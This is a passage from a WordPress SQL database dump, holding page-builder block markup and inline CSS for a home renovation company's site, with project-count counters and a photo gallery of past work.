type=\"text/css\"> .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40e7f1d9-3bdc-4663-8f6e-103dd744774b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"96825ed7-add1-4702-868f-b0437418bf4e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"3c19c43e-2a66-4e93-bc55-5b7f00e5a678\"} -->\n<style type=\"text/css\"> .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"719d3f20-fd00-4b93-8eb7-4c264d4c712b\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"fd8fadce-8cee-456b-9c07-93381eebd5b2\"} -->\n<style type=\"text/css\"> .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fd8fadce-8cee-456b-9c07-93381eebd5b2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"92918f7a-2108-4235-a165-692ee41bca12\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">320</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Recent Work','','inherit','closed','closed','','166-revision-v1','','','2022-08-24 17:54:14','2022-08-24 17:54:14','',166,'https://cteisys.com/?p=479',0,'revision','',0);
INSERT INTO `wp0y_posts` VALUES (478,1,'2022-08-24 17:39:02','2022-08-24 17:39:02','<!-- wp:paragraph -->\n<p>We take pride in our work. Let us show you. Contact us today (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25660384_1899639140050518_6277447985993158090_n.jpg\" alt=\"\" class=\"wp-image-450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25592097_1899639136717185_4321270429465251825_n.jpg\" alt=\"\" class=\"wp-image-449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23844616_1868197126528053_4157812209739993838_n.jpg\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23843260_1868197133194719_3148537784022538449_n.jpg\" alt=\"\" class=\"wp-image-447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23795383_1868197219861377_192834509148892931_n.jpg\" alt=\"\" class=\"wp-image-446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23517652_1851799148167851_4518671867384389908_n.jpg\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18119545_1646581548689613_8488233903493088586_n.jpg\" alt=\"\" class=\"wp-image-444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18118635_1641106092570492_880445919232503964_n.jpg\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/280659088_5602458996435162_2458487168335242841_n.jpg\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" class=\"wp-image-413\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":414,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" class=\"wp-image-414\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/12038053_1138498862831220_6417864339135922840_n.jpg\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg\" alt=\"\" class=\"wp-image-438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" 